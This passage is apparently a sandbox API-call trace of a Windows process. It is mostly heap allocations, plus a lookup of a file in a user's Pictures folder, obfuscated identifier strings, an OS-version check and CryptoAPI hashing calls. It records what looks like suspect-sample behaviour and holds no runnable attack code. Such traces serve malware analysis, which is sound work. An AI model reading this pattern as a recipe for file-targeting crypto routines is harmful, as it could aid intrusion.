Size=0x20) returned 0x2a77d50 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0212.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0212.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0212.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0212.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0212.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0212.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0212.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0212.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0212.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0212.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0212.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0212.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0212.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0212.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0212.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0212.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0212.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0212.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0212.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0212.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0212.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0212.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0212.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0212.003] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Y1E-1EvHMk4d A6QVp8.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf19ccb10, ftCreationTime.dwHighDateTime=0x1d5d5b1, ftLastAccessTime.dwLowDateTime=0x886c4fc0, ftLastAccessTime.dwHighDateTime=0x1d5d21a, ftLastWriteTime.dwLowDateTime=0x886c4fc0, ftLastWriteTime.dwHighDateTime=0x1d5d21a, nFileSizeHigh=0x0, nFileSizeLow=0x575e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y1E-1EvHMk4d A6QVp8.png", cAlternateFileName="Y1E-1E~1.PNG")) returned 0x9e2078 [0212.003] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0212.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0212.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0212.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0212.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0212.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0212.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.005] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.005] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0212.005] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0212.005] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.006] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0212.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0212.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0212.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0212.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0212.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.007] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0212.007] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0212.007] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0212.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0212.007] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.007] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0212.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0212.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0212.008] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7caa0) returned 1 [0212.008] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0212.008] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0212.008] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.008] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.008] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0212.008] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0212.009] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.009] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.009] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.009] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.009] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.009] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.009] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.009] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.009] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.009] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab398, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0212.009] CryptCreateHash (in: hProv=0xa7caa0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0212.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.010] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0212.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.010] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.010] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0212.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab290, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0212.010] CryptHashData (hHash=0x9e1db8, pbData=0x2a71cf8, 